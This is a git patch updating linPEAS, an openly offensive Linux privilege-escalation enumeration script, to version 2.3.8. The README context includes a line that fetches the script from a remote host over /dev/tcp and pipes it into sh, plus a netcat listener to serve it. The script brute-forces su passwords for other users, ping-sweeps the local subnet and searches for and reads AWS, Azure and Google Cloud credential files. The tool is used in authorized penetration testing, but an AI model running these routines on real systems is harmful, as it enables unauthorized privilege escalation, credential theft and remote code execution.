From 6f8f43a1678340332d20e4e58f7cdbc50ffc6e9a Mon Sep 17 00:00:00 2001 From: carlospolop Date: Thu, 12 Mar 2020 12:29:35 +0000 Subject: [PATCH] linpeasv2.3.8 --- linPEAS/README.md | 8 +++++++- linPEAS/linpeas.sh | 40 ++++++++++++++++++++++++++-------------- 2 files changed, 33 insertions(+), 15 deletions(-) mode change 100644 => 100755 linPEAS/linpeas.sh diff --git a/linPEAS/README.md b/linPEAS/README.md index e909dd4..934d083 100644 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -6,7 +6,7 @@ Check the **Local Linux Privilege Escalation checklist** from **[book.hacktricks.xyz](https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist)**. -[![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/279208) +[![asciicast](https://asciinema.org/a/250532.png)](https://asciinema.org/a/309566) ## Quick Start @@ -25,6 +25,12 @@ nc -q 5 -lvnp 80 < linpeas.sh cat < /dev/tcp/10.10.10.10/80 | sh ``` +```bash +#Output to file +linpeas -a > /dev/shm/linpeas.txt +less -r /dev/shm/linpeas.txt #Read with colors +``` + **Use the parameter `-a` to execute all these checks.** ## Basic Information diff --git a/linPEAS/linpeas.sh b/linPEAS/linpeas.sh old mode 100644 new mode 100755 index 414f11d..0e9738d --- a/linPEAS/linpeas.sh +++ b/linPEAS/linpeas.sh @@ -1,6 +1,6 @@ #!/bin/sh -VERSION="v2.3.7" +VERSION="v2.3.8" ADVISORY="linpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission." @@ -16,7 +16,7 @@ else fi -########################################### +########################################### #---------------) Colors (----------------# ########################################### @@ -130,7 +130,7 @@ spath=":$PATH" for P in $ADDPATH; do if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi done -writeB="\.sh$\|\./\|/authorized_keys\|/bin/\|/boot/\|/etc/apache2/apache2.conf\|/etc/apache2/httpd.conf\|/etc/hosts.allow\|/etc/hosts.deny\|/etc/httpd/conf/httpd.conf\|/etc/httpd/httpd.conf\|/etc/inetd.conf\|/etc/init\|/etc/incron.conf\|/etc/login.defs\|/etc/logrotate.d/\|/etc/modprobe.d/\|/etc/pam.d/\|/etc/php.*/fpm/pool.d/\|/etc/php/.*/fpm/pool.d/\|/etc/rsyslog.d/\|/etc/skel/\|/etc/sysconfig/network-scripts/\|/etc/sysctl.conf\|/etc/sysctl.d/\|/etc/uwsgi/apps-enabled/\|/etc/xinetd.conf\|/etc/xinetd.d/\|/etc/\|/home//\|/lib/\|/log/\|/mnt/\|/root\|/sys/\|/usr/bin\|/usr/games\|/usr/lib\|/usr/local/bin\|/usr/local/games\|/usr/local/sbin\|/usr/sbin\|/sbin/\|/var/log/" +writeB="\.sh$\|\./\|/authorized_keys\|/bin/\|/boot/\|/etc/apache2/apache2.conf\|/etc/apache2/httpd.conf\|/etc/hosts.allow\|/etc/hosts.deny\|/etc/httpd/conf/httpd.conf\|/etc/httpd/httpd.conf\|/etc/inetd.conf\|/etc/incron.conf\|/etc/login.defs\|/etc/logrotate.d/\|/etc/modprobe.d/\|/etc/pam.d/\|/etc/php.*/fpm/pool.d/\|/etc/php/.*/fpm/pool.d/\|/etc/rsyslog.d/\|/etc/skel/\|/etc/sysconfig/network-scripts/\|/etc/sysctl.conf\|/etc/sysctl.d/\|/etc/uwsgi/apps-enabled/\|/etc/xinetd.conf\|/etc/xinetd.d/\|/etc/\|/home//\|/lib/\|/log/\|/mnt/\|/root\|/sys/\|/usr/bin\|/usr/games\|/usr/lib\|/usr/local/bin\|/usr/local/games\|/usr/local/sbin\|/usr/sbin\|/sbin/\|/var/log/" writeVB="/etc/anacrontab\|/etc/bash.bashrc\|/etc/bash_completion\|/etc/bash_completion.d/\|/etc/cron\|/etc/environment\|/etc/environment.d/\|/etc/group\|/etc/incron.d/\|/etc/init\|/etc/master.passwd\|/etc/passwd\|/etc/profile\|/etc/profile.d/\|/etc/rc.d\|/etc/shadow\|/etc/sudoers\|/etc/sudoers.d/\|/etc/supervisor/conf.d/\|/etc/supervisor/supervisord.conf\|/etc/sys\|/etc/systemd\|/lib/systemd/\|/root/.ssh/\|/systemd/system\|/var/spool/anacron\|/var/spool/cron/crontabs\|"`echo $PATH 2>/dev/null| sed 's/:/\\\|/g'` sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/' | sed 's/|/\\\|/g'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere @@ -176,7 +176,7 @@ mail_apps="Postfix\|Dovecot\|Exim\|SquirrelMail\|Cyrus\|Sendmail\|Courier" profiledG="01-locale-fix.sh\|apps-bin-path.sh\|bash_completion.sh\|cedilla-portuguese.sh\|colorgrep.csh\|colorgrep.sh\|colorxzgrep.csh\|colorxzgrep.sh\|colorzgrep.csh\|colorzgrep.sh\|csh.local\|gawk.csh\|gawk.sh\|kali.sh\|lang.csh\|lang.sh\|less.csh\|less.sh\|sh.local\|vte-2.91.sh" -knw_emails="aeb@debian.org\|berni@debian.org\|debian@jff.email\|debian-boot@lists.debian.org\|debian-med-packaging@lists.alioth.debian.org\|devel@kali.org\|dm-devel@redhat.com\|ftpmaster@ubuntu.com\|gcs@debian.org\|guillem@debian.org\|guus@debian.org\|isc-dhcp@packages.debian.org\|kilobyte@angband.pl\|lamont@debian.org\|linux-xfs@vger.kernel.org\|mattia@debian.org\|mmind@debian.org\|open-iscsi@packages.debian.org\|open-isns@packages.debian.org\|packages@qa.debian.org\|packages@release.debian.org\|parted-maintainers@alioth-lists.debian.net\|petere@debian.org\|pkg-gnupg-maint@lists.alioth.debian.org\|pkg-gnutls-maint@lists.alioth.debian.org\|rogershimizu@gmail.com\|team+dns@tracker.debian.org\|team+lvm@tracker.debian.org\|thmarques@gmail.com\|tytso@mit.edu\|wpa@packages.debian.org" +knw_emails="aeb@debian.org\|anibal@debian.org\|berni@debian.org\|daniel@lists.debian-maintainers.org\|debian@jff.email\|debian-boot@lists.debian.org\|debian-bsd@lists.debian.org\|debian-glibc@lists.debian.org\|debian-med-packaging@lists.alioth.debian.org\|devel@kali.org\|dm-devel@redhat.com\|djpig@debian.org\|ender@debian.org\|ftpmaster@ubuntu.com\|gcs@debian.org\|guillem@debian.org\|guus@debian.org\|isc-dhcp@packages.debian.org\|kilobyte@angband.pl\|lamont@debian.org\|linux-xfs@vger.kernel.org\|mattia@debian.org\|mmind@debian.org\|open-iscsi@packages.debian.org\|open-isns@packages.debian.org\|packages@qa.debian.org\|packages@release.debian.org\|parted-maintainers@alioth-lists.debian.net\|parted-maintainers@lists.alioth.debian.org\|petere@debian.org\|pkg-gnupg-maint@lists.alioth.debian.org\|pkg-gnutls-maint@lists.alioth.debian.org\|pkg-lvm-maintainers@lists.alioth.debian.org\|pkg-mdadm-devel@lists.alioth.debian.org\|racke@linuxia.de\|rogershimizu@gmail.com\|team+dns@tracker.debian.org\|team+lvm@tracker.debian.org\|thmarques@gmail.com\|tytso@mit.edu\|wpa@packages.debian.org\|xfs@oss.sgi.com" ########################################### #---------) Checks before start (---------# @@ -304,7 +304,7 @@ echo "      [4 su_try_pwd (){ USER=$1 PASSWORDTRY=$2 - trysu=`echo "$PASSWORDTRY" | timeout 0.7 su $USER -c whoami 2>/dev/null` + trysu=`echo "$PASSWORDTRY" | timeout 1 su $USER -c whoami 2>/dev/null` if [ "$trysu" ]; then echo " You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m," fi @@ -323,6 +323,13 @@ su_brute_user_num (){ wait } +check_if_su_brute(){ + error=$(echo "" | timeout 1 su `whoami` -c whoami 2>&1); + if [ ! "`echo $error | grep "must be run from a terminal"`" ]; then + echo "1" + fi +} + ########################################### #----------) Network functions (----------# ########################################### @@ -340,7 +347,7 @@ select_nc (){ $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1) if [ $? -eq 2 ] then - NC_SCAN="timeout 0.7 $FOUND_NC -v -n" + NC_SCAN="timeout 1 $FOUND_NC -v -n" fi } @@ -352,7 +359,7 @@ icmp_recon (){ (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed "s,[0-9]\+.[0-9]\+.[0-9]\+.[0-9]\+,${C}[1;31m&${C}[0m,") & for j in $(seq 0 254) do - (timeout 0.7 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed "s,[0-9]\+.[0-9]\+.[0-9]\+.[0-9]\+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed "s,[0-9]\+.[0-9]\+.[0-9]\+.[0-9]\+,${C}[1;31m&${C}[0m,") & done wait } @@ -664,7 +671,7 @@ if [ "`echo $CHECKS | grep SysI`" ]; then if [ -z "$ASLR" ]; then echo_not_found "/proc/sys/kernel/randomize_va_space"; else - if [ "$ASLR" -eq "0" ]; then printf $R"No"$NC; else printf $GREEN"Yes"$NC; fi + if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi echo "" fi echo "" @@ -861,11 +868,16 @@ if [ "`echo $CHECKS | grep UsrI`" ]; then #-- 7UI) Brute su if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ] && ! [ "$IAMROOT" ]; then printf $Y"[+] "$GREEN"Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds\n"$NC - SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` - for u in $SHELLUSERS; do - echo " Bruteforcing user $u..." - su_brute_user_num $u $PASSTRY - done + POSSIBE_SU_BRUTE=`check_if_su_brute`; + if [ "$POSSIBE_SU_BRUTE" ]; then + SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1` + for u in $SHELLUSERS; do + echo " Bruteforcing user $u..." + su_brute_user_num $u $PASSTRY + done + else + printf $GREEN"It's not possible to brute-force su.\n\n"$NC + fi else printf $Y"[+] "$GREEN"Don forget to test 'su' as any other user with shell: without password and with their names as password (I can't do it...)\n"$NC fi @@ -1255,7 +1267,7 @@ if [ "`echo $CHECKS | grep SofI`" ]; then ##-- 24SI) Cloud keys printf $Y"[+] "$GREEN"Looking for Cloud credentials (AWS, Azure, GC)\n"$NC - cloudcreds=`find /var /etc /home /root /tmp /usr /opt -type f -name "credentials" -o \( -name "credentials.db" \) -o \( -name "legacy_credentials.db" \) -o \( -name "access_tokens.db" \) -o \( -name "accessTokens.json" \) o \( -name "azureProfile.json" \) 2>/dev/null` + cloudcreds=`find /var /etc /home /root /tmp /usr /opt -type f \( -name "credentials" -o -name "credentials.db" -o -name "legacy_credentials.db" -o -name "access_tokens.db" -o -name "accessTokens.json" -o -name "azureProfile.json" \) 2>/dev/null` if [ "$cloudcreds" ]; then for f in "$cloudcreds"; do printf "Reading $f\n" | sed "s,credentials\|credentials.db\|legacy_credentials.db\|access_tokens.db\|accessTokens.json\|azureProfile.json,${C}[1;31m&${C}[0m,g"